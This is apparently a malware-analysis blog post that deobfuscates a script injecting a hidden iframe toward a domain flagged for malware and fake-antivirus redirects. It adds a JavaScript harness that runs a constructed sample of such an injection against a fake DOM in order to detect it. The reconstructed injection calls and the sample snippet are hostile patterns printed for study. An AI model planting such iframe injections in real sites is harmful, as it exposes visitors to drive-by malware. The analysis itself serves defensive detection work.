Malicious iframes are often used to distribute malware hosted on external web resources (websites).
Let's take a look at the interesting stuff:
Again, this just combines all the strings in the variables inside the parentheses with the string inside p to get
As we saw earlier, se = 'iframe', hence ip = document.createElement('iframe'); this is pretty self-explanatory.
Which is document.createElement('iframe').setAttribute('src', 'http: //zirycatum.com/k985ytv.htm'). Now we are all set to inject the newly created iframe into the rendered document:
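The steps above can be checked without a browser by running the script against a recording stand-in for `document`. The following is an added example, not code from the original post: the sample script is constructed in the style described (it reuses the variable names se, ip and p), its URL is a placeholder, and `makeRecorder` and `findInjectedIframes` are hypothetical helper names.

```javascript
// Constructed sample in the style described above (not the original script);
// the URL is a placeholder.
const SAMPLE = `
var a = 'if', b = 'ra', c = 'me', p = 'http://';
var se = a + b + c;
var u = p + 'malicious' + '.example' + '/landing.htm';
var ip = document.createElement(se);
ip.setAttribute('src', u);
document.body.appendChild(ip);
`;

// Minimal fake DOM: records what the script builds instead of rendering it.
function makeRecorder() {
  const created = [];
  const makeElement = (tag) => {
    const el = { tag: String(tag).toLowerCase(), attrs: {}, attached: false };
    el.setAttribute = (k, v) => { el.attrs[String(k).toLowerCase()] = String(v); };
    el.appendChild = (child) => { child.attached = true; return child; };
    return el;
  };
  const document = {
    createElement: (tag) => {
      const el = makeElement(tag);
      created.push(el);
      return el;
    },
  };
  document.body = makeElement('body');
  return { document, created };
}

// Run a snippet against the fake document and list the iframes it creates.
// new Function is not an isolation boundary: analyse real samples only
// inside a disposable analysis VM.
function findInjectedIframes(source) {
  const { document, created } = makeRecorder();
  try {
    new Function('document', 'window', source)(document, { document });
  } catch (err) {
    // Obfuscated code often touches APIs the stub lacks; keep what was recorded.
  }
  return created
    .filter((el) => el.tag === 'iframe')
    .map((el) => ({ src: el.attrs.src || null, attached: el.attached }));
}

console.log(findInjectedIframes(SAMPLE));
```

An entry with `attached: true` means the script actually inserted the iframe into the page rather than only building it.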
Blacklisting status
Now let's see whether the redirection is really malicious. Let's check the domain in the Quttera scanner again.
[Image: Quttera website malware scanner]
The website is flagged as Suspicious by Google Safe Browsing for hosting malware. It is also listed in MalwareDomainList for redirecting to fake AV,